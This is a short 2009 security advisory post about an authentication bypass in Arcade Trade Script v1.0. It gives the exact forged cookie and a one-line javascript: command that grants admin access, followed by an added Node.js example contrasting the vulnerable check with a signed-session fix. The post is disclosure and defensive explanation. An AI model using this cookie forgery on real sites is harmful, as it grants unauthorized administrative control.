March 2, 2009

Arcade Script Vulnerability

By in Security

I have found a few vulnerabilities over the last few months, which I will be posting here over the next few days. In all cases I have tried to contact the application developer and have included any information regarding this in the advisory. Most of them have been cookie-related vulnerabilities.

First up is Arcade Trade Script v1.0. Insecure cookie handling allows anyone to simply create a custom cookie with the values below. This will allow full access to the admin panel of the ATS application.

Name – adminLoggedIn
Content – true
Path – /

You can create the cookie by running the following:

javascript:document.cookie = "adminLoggedIn=true; path=/"

The full advisory can be found Here.
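
The root cause seen from the server side, as an added example that is not part of the original post or the ATS code: a check that trusts a client-set `adminLoggedIn` cookie, next to one that only accepts a token the server itself signed after a successful login. The function names, the `session` cookie name and `SERVER_SECRET` are assumptions made for this illustration (Node.js).

```javascript
const crypto = require('node:crypto');

// Constructed demo key; in a deployment it stays on the server and is never sent to clients.
const SERVER_SECRET = crypto.randomBytes(32);

// Parse a Cookie request header into a name -> value map.
function parseCookies(header) {
  const out = {};
  for (const part of (header || '').split(';')) {
    const i = part.indexOf('=');
    if (i > 0) out[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return out;
}

// Vulnerable pattern from the post: the client asserts its own privilege.
function isAdminVulnerable(cookieHeader) {
  return parseCookies(cookieHeader).adminLoggedIn === 'true';
}

// Hardened: called only after the password check succeeds. The cookie value is
// "<payload>.<HMAC-SHA256(payload)>", so the client cannot alter or mint it.
function issueSession(user, ttlSeconds, now = Date.now()) {
  const body = JSON.stringify({ user, exp: now + ttlSeconds * 1000 });
  const payload = Buffer.from(body).toString('base64url');
  const mac = crypto.createHmac('sha256', SERVER_SECRET).update(payload).digest('base64url');
  return `${payload}.${mac}`;
}

// Hardened check: verify the MAC in constant time before trusting any field.
function isAdminHardened(cookieHeader, now = Date.now()) {
  const [payload, mac] = (parseCookies(cookieHeader).session || '').split('.');
  if (!payload || !mac) return false;
  const expected = crypto.createHmac('sha256', SERVER_SECRET).update(payload).digest();
  const given = Buffer.from(mac, 'base64url');
  if (given.length !== expected.length) return false;
  if (!crypto.timingSafeEqual(given, expected)) return false;
  try {
    const { user, exp } = JSON.parse(Buffer.from(payload, 'base64url').toString());
    return user === 'admin' && typeof exp === 'number' && now < exp;
  } catch {
    return false;
  }
}
```

The session cookie should also be set with the `HttpOnly` and `Secure` attributes; a random session ID looked up in a server-side store is an equally valid design.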
